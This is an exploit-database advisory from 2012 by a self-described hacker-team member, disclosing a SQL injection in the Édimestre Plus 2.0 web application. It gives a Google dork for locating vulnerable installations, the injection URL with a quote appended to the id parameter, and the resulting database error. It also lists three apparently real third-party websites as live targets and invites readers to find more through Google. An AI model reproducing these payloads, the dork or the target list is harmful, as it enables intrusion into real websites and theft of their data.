1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
 0                                                                        1
 1                       dark-puzzle[at]live[at]fr                        0
 0               ==========================================               1
 1                 Pentesting/exploit coding/bug research                 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: Édimestre Plus 2.0 - Sql injection Vulnerability
# Date: 24 June 2012
# Author: Dark-Puzzle
# Vendor Website : http://www.edimestre.ca/
# Version: 2.0 previous versions may also be vulnerable .
# Category: Webapps/0day
# Google dork: intext:"Powered by Edimaster Plus" inurl:images.php
# Tested on: Windows Xp Sp2 , Backtrack 5 .

Exploit : 

http://www.example.com/modules/images/images.php?id=1&image=213&langue=en&menu=3

Howto:

the string (') must be added to ?id=7' without deleting the other functions 
"&image=213&langue=en&menu=3"

else the sql error won't show up .

Example :

http://www.example.com/modules/images/images.php?id=1'&image=213&langue=en&menu=3

error : 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (langue = 'en') ORDER BY length(texteurl) DESC' at line 2
+other stuff below .


Example Sites :

http://www.pedxray.com/modules/images/images.php?id=7'&image=335&langue=en&menu=31
http://netic.ca/modules/images/images.php?id=17'&image=379&langue=en
http://www.bertrandrpitt.net/modules/images/images.php?id=3'&image=136&langue=en

More At Google .

DARK-PUZZLE (Souhail)

Follow me : https://www.facebook.com/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...